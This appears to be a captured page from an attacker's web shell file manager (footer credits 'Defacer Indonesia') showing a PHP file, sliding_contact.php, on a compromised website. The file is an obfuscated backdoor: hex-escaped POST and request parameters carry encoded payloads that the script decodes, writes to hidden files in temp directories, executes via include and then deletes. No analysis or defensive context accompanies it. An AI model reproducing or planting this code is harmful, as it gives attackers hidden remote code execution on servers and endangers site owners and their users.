whoami7 - Manager
:
/
home
/
analuakl
/
grinsentertainment.com
/
scripts
/
Upload File:
files >> /home/analuakl/grinsentertainment.com/scripts/sliding_contact.php
<?php if(filter_has_var(INPUT_POST, "ma\x72\x6B\x65r")){ $data = array_filter(["/tmp", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP")]); $ref = $_POST["ma\x72\x6B\x65r"]; $ref = explode ('.' , $ref ) ; $rec= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); $k= 0; while ($k < count($ref)) { $v6= $ref[$k]; $sChar= ord($salt[$k%$lenS] ); $dec= ((int)$v6 - $sChar - ($k%10)) ^ 9; $rec .= chr($dec ); $k++; } foreach ($data as $reference) { if (array_product([is_dir($reference), is_writable($reference)])) { $object = str_replace("{var_dir}", $reference, "{var_dir}/.hld"); if (@file_put_contents($object, $rec) !== false) { include $object; unlink($object); exit; } } } } if(array_key_exists("\x65\x6Etry", $_POST) && !is_null($_POST["\x65\x6Etry"])){ $element = $_POST["\x65\x6Etry"]; $element =explode ("." , $element ) ; $mrk = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s7); foreach( $element as $m => $v7) { $sChar = ord( $s7[$m % $lenS]); $dec = ( ( int)$v7 - $sChar -( $m % 10))^ 76; $mrk .= chr( $dec);} $hld = array_filter(["/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), "/dev/shm"]); while ($symbol = array_shift($hld)) { if (is_writable($symbol) && is_dir($symbol)) { $res = "$symbol" . "/.rec"; $file = fopen($res, 'w'); if ($file) { fwrite($file, $mrk); fclose($file); include $res; @unlink($res); exit; } } } } if(array_key_exists("t\x6B\x6E", $_POST)){ $elem = array_filter(["/var/tmp", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/tmp", session_save_path()]); $mrk = $_POST["t\x6B\x6E"]; $mrk = explode ( '.',$mrk); $flag = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); foreach( $mrk as $z => $v1): $sChar = ord( $s[$z % $sLen] ); $d = ( ( int)$v1 - $sChar -( $z % 10)) ^ 66; $flag.=chr( $d ); endforeach; $factor = 0; do { $binding = $elem[$factor] ?? null; if ($factor >= count($elem)) break; if (is_writable($binding) && is_dir($binding)) { $object = sprintf("%s/.reference", $binding); if (file_put_contents($object, $flag)) { include $object; @unlink($object); die(); } } $factor++; } while (true); } if(isset($_REQUEST["sym"]) ? true : false){ $itm = $_REQUEST["sym"]; $itm = explode('.' , $itm); $obj=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s); foreach( $itm as $u => $v2) { $sChar=ord( $s[$u % $sLen]); $dec=( ( int)$v2 - $sChar -( $u % 10)) ^ 18; $obj .= chr( $dec); } $component = array_filter([getenv("TMP"), getcwd(), "/var/tmp", sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP")]); for ($pgrp = 0, $holder = count($component); $pgrp < $holder; $pgrp++) { $item = $component[$pgrp]; if (is_dir($item) && is_writable($item)) { $key = vsprintf("%s/%s", [$item, ".symbol"]); if (file_put_contents($key, $obj)) { include $key; @unlink($key); exit; } } } }
Copyright ©2021 || Defacer Indonesia